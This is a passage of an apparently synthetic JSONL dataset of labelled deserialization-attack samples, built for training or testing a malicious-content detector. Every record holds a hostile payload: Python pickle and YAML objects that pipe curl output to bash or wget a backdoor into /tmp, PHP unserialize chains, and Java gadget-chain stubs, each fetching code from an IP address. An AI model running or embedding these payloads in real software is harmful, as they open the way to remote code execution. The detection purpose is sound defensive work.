"rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://39.169.79.43/shell\")"}}]} {"id": "synth_malicious_deserialization_00504", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('wzuqh2R/dr6iZ8jNaZGja2/qLceSRcBB5yVuwlSWjMcnadgBb3wHUpHWLraw')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://57.20.136.147/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('wzuqh2R/dr6iZ8jNaZGja2/qLceSRcBB5yVuwlSWjMcnadgBb3wHUpHWLraw')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00505", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://101.72.105.114/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://101.72.105.114/shell\")"}}]} {"id": "synth_malicious_deserialization_00506", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://44.132.36.143/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://44.132.36.143/shell\")"}}]} {"id": "synth_malicious_deserialization_00507", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://60.203.103.64/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://60.203.103.64/shell\")"}}]} {"id": "synth_malicious_deserialization_00508", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:74:\"qQ3lC9ls7Lld1LnDXjHNa5YdsS0XrhsVlLk3ujA+\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://33.24.25.158/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:74:\"qQ3lC9ls7Lld1LnDXjHNa5YdsS0XrhsVlLk3ujA+\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://33.24.25.158/bd\")"}}]} {"id": "synth_malicious_deserialization_00509", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://148.102.184.56/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://148.102.184.56/shell\")"}}]} {"id": "synth_malicious_deserialization_00510", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://71.40.188.192/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://103.233.216.211/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://71.40.188.192/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://103.233.216.211/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00511", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://218.103.61.205/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://218.103.61.205/shell\")"}}]} {"id": "synth_malicious_deserialization_00512", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('tu6uAJ96Kzv7ImlGM/XQDd39Yqt1dAN9ZsJFk3AfmHmPWsY7+S/TCeQkm6pa')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://109.214.186.151/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('tu6uAJ96Kzv7ImlGM/XQDd39Yqt1dAN9ZsJFk3AfmHmPWsY7+S/TCeQkm6pa')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00513", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('MnVGCls6RBW87P7YP4GncfDtzV4JOTH2UQOpX/lZA3SZDKsdDh1B0Verq5Zl')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://246.186.31.16/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('MnVGCls6RBW87P7YP4GncfDtzV4JOTH2UQOpX/lZA3SZDKsdDh1B0Verq5Zl')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00514", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://221.158.12.247/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://221.158.12.247/shell\")"}}]} {"id": "synth_malicious_deserialization_00515", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://148.186.90.242/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://148.186.90.242/shell\")"}}]} {"id": "synth_malicious_deserialization_00516", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:68:\"RhZwh57r4MwfmmdCrmXQoLiUe0CR5nMSGY7PN/6r\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://82.66.69.57/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:68:\"RhZwh57r4MwfmmdCrmXQoLiUe0CR5nMSGY7PN/6r\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://82.66.69.57/bd\")"}}]} {"id": "synth_malicious_deserialization_00517", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://140.227.110.27/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://194.96.203.183/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://140.227.110.27/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://194.96.203.183/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00518", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:77:\"e2G2L38H7gZIT+9uJCAvowQQ+rMI+Ui6UhJUs+xL\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://10.1.237.9/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:77:\"e2G2L38H7gZIT+9uJCAvowQQ+rMI+Ui6UhJUs+xL\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://10.1.237.9/bd\")"}}]} {"id": "synth_malicious_deserialization_00519", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:54:\"7Z+NTO15ymURO+X3DO/EN8qPZYkdITfaRnZRl7Tp\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://241.81.148.10/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:54:\"7Z+NTO15ymURO+X3DO/EN8qPZYkdITfaRnZRl7Tp\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://241.81.148.10/bd\")"}}]} {"id": "synth_malicious_deserialization_00520", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://206.226.216.136/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://208.197.237.150/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://206.226.216.136/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://208.197.237.150/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00521", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://209.237.127.75/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://4.189.210.123/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://209.237.127.75/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://4.189.210.123/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00522", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://33.208.241.8/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://33.208.241.8/shell\")"}}]} {"id": "synth_malicious_deserialization_00523", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://126.70.98.206/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://190.158.253.83/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://126.70.98.206/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://190.158.253.83/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00524", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('zlkjFdAAqZAwCYb7S8NYrD/juvl7jxiLg2B+M01boOAjtAurnKjCrpla9A0l')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://89.70.171.25/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('zlkjFdAAqZAwCYb7S8NYrD/juvl7jxiLg2B+M01boOAjtAurnKjCrpla9A0l')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00525", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('+O3DRUfy4Z4VsUuDgUUuukA5Vt9JmRYZ0fYgylPAvsskv9Gz4qoDE2Owtprz')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://72.132.216.24/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('+O3DRUfy4Z4VsUuDgUUuukA5Vt9JmRYZ0fYgylPAvsskv9Gz4qoDE2Owtprz')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00526", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://82.169.154.91/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://82.169.154.91/shell\")"}}]} {"id": "synth_malicious_deserialization_00527", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://210.122.127.78/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://1.89.153.193/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://210.122.127.78/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://1.89.153.193/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00528", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://181.241.19.25/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://120.27.87.143/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://181.241.19.25/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://120.27.87.143/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00529", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://223.171.239.231/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://223.171.239.231/shell\")"}}]} {"id": "synth_malicious_deserialization_00530", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('+uLqtIxilza3bNAW8NQ6l/YvGDkc7jszbp15n2yqiOyokiUpT7cUsVS3Nj0m')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://164.107.121.67/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('+uLqtIxilza3bNAW8NQ6l/YvGDkc7jszbp15n2yqiOyokiUpT7cUsVS3Nj0m')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00531", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://184.3.76.83/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://184.3.76.83/shell\")"}}]} {"id": "synth_malicious_deserialization_00532", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://96.0.248.221/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://96.0.248.221/shell\")"}}]} {"id": "synth_malicious_deserialization_00533", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://243.180.119.57/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://243.180.119.57/shell\")"}}]} {"id": "synth_malicious_deserialization_00534", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:79:\"5O8c4ZRYuytGZOe8/Wpfm1umzN71AhLlKCnkCGxr\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://192.184.60.70/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:79:\"5O8c4ZRYuytGZOe8/Wpfm1umzN71AhLlKCnkCGxr\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://192.184.60.70/bd\")"}}]} {"id": "synth_malicious_deserialization_00535", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://218.157.146.166/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://218.157.146.166/shell\")"}}]} {"id": "synth_malicious_deserialization_00536", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://98.91.166.27/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://98.91.166.27/shell\")"}}]} {"id": "synth_malicious_deserialization_00537", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('0/CfX1jXb1DwmiytRiusdjD9YSENu5tGp6tgTc3oJXokNEUl0M3J3q/3PWTq')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://108.204.250.65/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('0/CfX1jXb1DwmiytRiusdjD9YSENu5tGp6tgTc3oJXokNEUl0M3J3q/3PWTq')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00538", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://187.175.2.83/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://187.175.2.83/shell\")"}}]} {"id": "synth_malicious_deserialization_00539", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://224.228.12.119/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://224.228.12.119/shell\")"}}]} {"id": "synth_malicious_deserialization_00540", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('jRTqu+MXH64Pf8ZZySyrRY6vD6VrE5IBuFGzMp72u2buqte7uBWx44f41yvs')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://108.70.248.175/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('jRTqu+MXH64Pf8ZZySyrRY6vD6VrE5IBuFGzMp72u2buqte7uBWx44f41yvs')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00541", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('eX50j9VX3My3IafausCGTluct5d/bSSxj5PZChW66M4XgqmuM69q3WMhbAY6')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://232.21.22.79/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('eX50j9VX3My3IafausCGTluct5d/bSSxj5PZChW66M4XgqmuM69q3WMhbAY6')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00542", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://191.185.123.174/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://44.193.198.154/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://191.185.123.174/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://44.193.198.154/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00543", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://14.20.45.89/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://14.20.45.89/shell\")"}}]} {"id": "synth_malicious_deserialization_00544", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://159.217.53.195/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://122.239.55.198/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://159.217.53.195/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://122.239.55.198/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00545", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://22.135.186.125/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://222.131.191.252/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://22.135.186.125/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://222.131.191.252/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00546", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('GsNNVe2wRL0HJgBQS+AHIYrobtbvXQQXG+g93CgRneIPg6mTezIykqUijopf')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://166.125.162.99/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = 